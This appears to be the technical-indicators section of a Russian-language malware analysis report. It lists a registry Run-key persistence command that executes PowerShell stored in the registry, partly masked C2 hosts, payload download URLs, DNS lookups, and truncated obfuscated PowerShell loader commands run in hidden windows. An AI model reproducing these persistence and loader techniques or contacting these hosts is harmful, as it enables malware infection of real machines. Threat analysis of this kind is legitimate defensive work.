Техническая информация
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'Seedman' = '%SaltoQ% -w 1 $Hemithyroidectomy127=(Get-ItemProperty -Path 'HKCU:\Vallens\').Ethynyl;%SaltoQ% ($Hemithyroidectomy127)'
- ieinstal.exe
- '10#.#06.240.67':80
- 'sh####memore.com':2023
- 'ge###ugin.net':80
- http://10#.#06.240.67/shitter/jrJzeVzMzpIxWFk86.prx
- http://ge###ugin.net/json.gp
- 'sh####memore.com':2023
- DNS ASK sh####memore.com
- DNS ASK ge###ugin.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Ignorer = """Gud;BecFMoruMusnSyscSkitGooiSteoSpunPal ToeFAppiDissparhPlabBruoPrewJoklMid0Ect spo{Non Ret Kno Aan RospUnkafugrLinaUntmOrd(Fje[CleSEnhtOverUnridegnStyglun]Ufo<StbTDorefnotKnirfo...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Ignorer = """Gud;BecFMoruMusnSyscSkitGooiSteoSpunPal ToeFAppiDissparhPlabBruoPrewJoklMid0Ect spo{Non Ret Kno Aan RospUnkafugrLinaUntmOrd(Fje[CleSEnhtOverUnridegnStyglun]Ufo<StbTDorefnotKnirfo...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' ";Function Fishbowl0 { param([String]$Tetraster); $Kornets = New-Object byte[] ($Tetraster.Length / 2); For($Siestaer=0; $Siestaer -lt $Tetraster.Length; $Siestaer+=2){ $Kornets...
- '%ProgramFiles(x86)%\internet explorer\ieinstal.exe'